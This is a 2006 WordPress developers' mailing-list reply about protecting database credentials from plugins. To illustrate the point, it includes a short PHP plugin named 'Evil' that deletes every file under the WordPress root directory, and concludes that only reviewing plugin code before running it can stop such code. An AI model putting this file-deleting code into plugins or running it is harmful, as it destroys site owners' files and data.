[wp-hackers] Keeping database connection info safe

Rob r at robm.me.uk
Sat Feb 25 02:52:22 GMT 2006


Joseph Scott wrote:
>
> You are absolutely correct.  I must admit that I hadn't though about 
> re-including the wp-config.php file.  Well that bites.  Is there any 
> way to really protect against this in either PHP4 or PHP5?  I'm 
> inclined at this point to say no and that everyone better be scanning 
> their plugins for "evil".  Has anyone put together a list of things 
> that should raise the red flag when they see it in a plugin?
>
>
> -- 
> Joseph Scott
> joseph at randomnetworks.com
> http://joseph.randomnetworks.com/
>
>
>
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers
>

But then what's to stop the inevitable

<?php
/*
Plugin Name: Evil
*/

foreach(glob(ABSPATH.'/*') as $file) {
    unlink($file);
}

?>

?

There's no way of stopping malicious code from running other than 
reviewing it before you run.

-- 
Rob Miller
http://robm.me.uk/ | http://kantian.co.uk/



More information about the wp-hackers mailing list